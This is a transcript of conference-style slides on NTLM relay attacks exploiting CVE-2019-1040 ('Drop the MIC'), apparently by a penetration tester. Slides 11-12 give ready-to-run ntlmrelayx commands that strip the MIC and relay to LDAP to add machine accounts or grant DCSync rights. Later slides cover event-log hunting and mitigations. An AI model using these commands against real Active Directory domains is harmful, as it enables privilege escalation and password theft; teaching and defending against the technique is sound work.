lateral movement using credentials relaying · 2021. 6. 9. · 5 more ntlm… • ntlm...
TRANSCRIPT
![Page 1: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/1.jpg)
Lateral Movement using Credentials Relaying
C V E - 2 0 1 9 - 1 0 4 0 / D r o p t h e M I C
![Page 2: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/2.jpg)
Background
2
• Penetration Tester @Deloitte’s Risk Advisory• @taso_x on Twitter• https://github.com/tasox• https://pentestlibrary.blogspot.com
![Page 3: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/3.jpg)
3
Why Drop The MIC?
• NTLM Relay is the most common technique used in Active Directory environment
• Compromise Enterprise Network (Impact)
• Bypass Microsoft’s security mechanisms (SMB Signing, LDAP Signing, MIC etc.)
• Relay between different protocols ( SMB->LDAP(S) )
• The missing puzzle from lately discovered vulnerabilities (Printer Bug, Exchange – One API)
• Only 2 tools (Responder, NTLMRelayx)
C V E - 2 0 1 9 - 1 0 4 0
![Page 4: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/4.jpg)
How it works“Attacker is able to modify the flags of the NTLM authentication including the signing requirement and bypass the NTLM Message Integrity Code (MIC) protection.”
What is the NTLM Protocol“Windows Challenge/Response (NTLM) is authentication protocol used on networks that include systems running the Windows operating system.”
C V E - 2 0 1 9 - 1 0 4 0 / D r o p t h e M I C
https://docs.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm
4
Lateral Movement using Credentials Relaying
![Page 5: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/5.jpg)
5
More NTLM…
• NTLM Authentication consists of 3 message types:
• When users authenticate to target via NTLM (NTLM over SMB, NTLM over LDAP, NTLM over HTTP, NTLM over RPC etc), they are vulnerable to relay attacks.
• In order to protect servers from relaying attacks Microsoft has introduced session signing (SMB Signing, LDAP Signing etc).
• NTLM Message Integrity Code (MIC) protection of the NTLM authentication.
![Page 6: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/6.jpg)
6
What is NTLM Message Integrity Code?
“The Message Integrity Code (MIC) field verifies that the 3 NTLM messages [NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE] were not modified during transit.”
![Page 7: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/7.jpg)
NTLMSSP_NEGOTIATE - Flags
• NTLMSSP_NEGOTIATE_ALWAYS_SIGN=0
• NTLMSSP_NEGOTIATE_SIGN=0
NTLMSSP_AUTHENTICATE - Flags• NTLMSSP_NEGOTIATE_ALWAYS_SIGN=0
• NTLMSSP_NEGOTIATE_SIGN=0
• NEGOTIATE_KEY_EXCHANGE=0
• NEGOTIATE_VERSION=0
• MIC field
https://blog.preempt.com/drop-the-mic
7
Drop The MIC (Modifications)C V E - 2 0 1 9 - 1 0 4 0 / D r o p t h e M I C
![Page 8: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/8.jpg)
Original NTLM_NEGOTIATE Modified NTLM_NEGOTIATE
8
Drop The MIC (Modifications)C V E - 2 0 1 9 - 1 0 4 0 / D r o p t h e M I C
![Page 9: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/9.jpg)
Original NTLM_AUTHENTICATE Modified NTLM_AUTHENTICATE
9
Drop The MIC (Modifications)C V E - 2 0 1 9 - 1 0 4 0 / D r o p t h e M I C
![Page 10: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/10.jpg)
Why LDAP?
10
“LDAP can be used to read and modify objects in the Active Directory. When authentication is relayed to LDAP, objects in the directory can be modified to grant an attacker privileges, including the privileges required for DCSync operations.”
https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
DCSync: An attacker can pretend to be a Domain Controller and request passwords from the targeted Domain Controller
![Page 11: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/11.jpg)
(NTLM over SMB) Relay to LDAPN T L M R e l a y x S y n t a x t a b l e
Attack Scenarios Protocol:Port Attack Flag Elevated NTLM Bypass MIC
Add a domain computer
Ldaps:636 --add-computer (1) No --remove-mic
Create a domain user & give DCSyncrights
Ldaps:636 --delegate-access Yes --remove-mic
Give DCSync rightsto an existing domain user, (2) domain computer
Ldap:389 --escalate-user Yes --remove-mic
11(1) Every domain user in AD can add 10 computer accounts.(2) Version 0.9.20-dev of ntlmrelayx can not give dcsync rights to a domain computer account.
![Page 12: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/12.jpg)
More (NTLM over SMB) Relay to LDAPN T L M R e l a y x S y n t a x t a b l e
Attack Scenarios Syntax
Create domain user and gives DCSync rights
ntlmrelayx.py -t ldaps://192.168.100.236 --delegate-access -smb2support --remove-mic
Create a domain computer account
ntlmrelayx.py -t ldaps://192.168.100.236 --add-computer -smb2support --remove-mic
Gives DCSync rights to an existing domain user / computer
ntlmrelayx.py -t ldap://192.168.100.236 --escalate-user <domain user / computer> -smb2support --remove-mic
12*the latest version 0.9.20-dev of ntlmrelayx can not give dcsync rights to a domain computer account.
![Page 13: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/13.jpg)
13
Create a domain Computer
![Page 14: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/14.jpg)
14
Create a domain User & Grant DCSync privileges
![Page 15: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/15.jpg)
15
Grant DCSync privileges to an existing domain User
![Page 16: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/16.jpg)
Create computer account (--add-computer)
Get-Eventlog 4741
(A computer account was created)
D r o p t h e M I C
16
Hunting Relaying
![Page 17: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/17.jpg)
Create User account & ACL Modification--delegate-access
Get-Eventlog 4720
(A user account was created)
D r o p t h e M I C
17
More Hunting
![Page 18: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/18.jpg)
Get-EventLog 5136(A directory service object was modified) Convert SDDL & Observe
D r o p t h e M I C
18
More Hunting
https://github.com/canix1/SDDL-Converter
![Page 19: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/19.jpg)
• Install Microsoft’s patches
• Configurations• Enforce SMB Signing
• LDAP Signing, LDAPS channel binding
• Disable NTLMv1
• Use Kerberos as much as possible
• Enable and monitor useful Windows Events
D r o p t h e M I C
Mitigation
19
![Page 20: Lateral Movement using Credentials Relaying · 2021. 6. 9. · 5 More NTLM… • NTLM Authentication consists of 3 message types: • When users authenticate to target via NTLM (NTLM](https://reader036.vdocuments.us/reader036/viewer/2022062510/6148358ecee6357ef925348a/html5/thumbnails/20.jpg)
Thank You
C r e d i t s :
• M a r i n a S i m a ko v, Ya r o n Z i n a r
• D i r k - J a n M o l l e m a
• A l b e r t o S o l i n o